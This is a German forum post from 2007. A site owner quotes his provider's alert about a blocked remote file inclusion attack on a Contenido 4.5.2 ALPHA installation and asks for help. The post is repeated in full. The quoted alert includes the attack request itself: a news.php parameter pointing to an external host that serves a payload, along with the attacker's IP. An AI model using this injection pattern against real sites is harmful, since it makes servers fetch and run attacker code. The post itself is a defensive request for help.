Sicherheitslücke Contenido 4.5.2 ALPHA!
Verfasst: Fr 26. Jan 2007, 09:39
Hallo,
wir erhielten von unserem Provider folgende Meldung zu einem Hacker-Angriff auf eine Contenido-Installation (4.5.2 ALPHA):
"...unseren Server-Überwachungs-Tools ist ein Hackversuch auf Ihrer Präsenz über die von Ihnen installierte Anwendung .../contenido/external/frontend/news.php aufgefallen.
Mittels des Aufrufs in ...contenido/external/frontend/news.php?cfg[path][includes]=http://k-is.info/ayen.htm? wurde von der IP-Adresse "125.162.0.78" versucht eine eigene Anwendung auf der Präsenz zu installieren. (Dieser Versuch konnte von unserem Überwachungs-Tool verhindert werden und ist auch im Webserver-Logfile im /logs-Ordner Ihres Webspace zu finden.)
Wir möchten Sie bitten zu überprüfen ob der ungebetene Besucher evtl. doch Daten auf Ihrer Präsenz verändern konnte. Selbstverständlich sollten Sie außerdem die unsichere Anwendung durch eine sichere Variante ersetzen. Falls Sie Ihre Präsenz auf einem Content Management oder Foren System aufgebaut ist, sollten Sie dringend die vom Hersteller angebotenen Sicherheitsupdates einspielen...."
Ist jemandem diese Sicherheitslücke bekannt?
Was kann dagegen getan werden?
Über eine schnelle Antwort wäre ich dankbar.
Gruß
Andreas
wir erhielten von unserem Provider folgende Meldung zu einem Hacker-Angriff auf eine Contenido-Installation (4.5.2 ALPHA):
"...unseren Server-Überwachungs-Tools ist ein Hackversuch auf Ihrer Präsenz über die von Ihnen installierte Anwendung .../contenido/external/frontend/news.php aufgefallen.
Mittels des Aufrufs in ...contenido/external/frontend/news.php?cfg[path][includes]=http://k-is.info/ayen.htm? wurde von der IP-Adresse "125.162.0.78" versucht eine eigene Anwendung auf der Präsenz zu installieren. (Dieser Versuch konnte von unserem Überwachungs-Tool verhindert werden und ist auch im Webserver-Logfile im /logs-Ordner Ihres Webspace zu finden.)
Wir möchten Sie bitten zu überprüfen ob der ungebetene Besucher evtl. doch Daten auf Ihrer Präsenz verändern konnte. Selbstverständlich sollten Sie außerdem die unsichere Anwendung durch eine sichere Variante ersetzen. Falls Sie Ihre Präsenz auf einem Content Management oder Foren System aufgebaut ist, sollten Sie dringend die vom Hersteller angebotenen Sicherheitsupdates einspielen...."
Ist jemandem diese Sicherheitslücke bekannt?
Was kann dagegen getan werden?
Über eine schnelle Antwort wäre ich dankbar.
Gruß
Andreas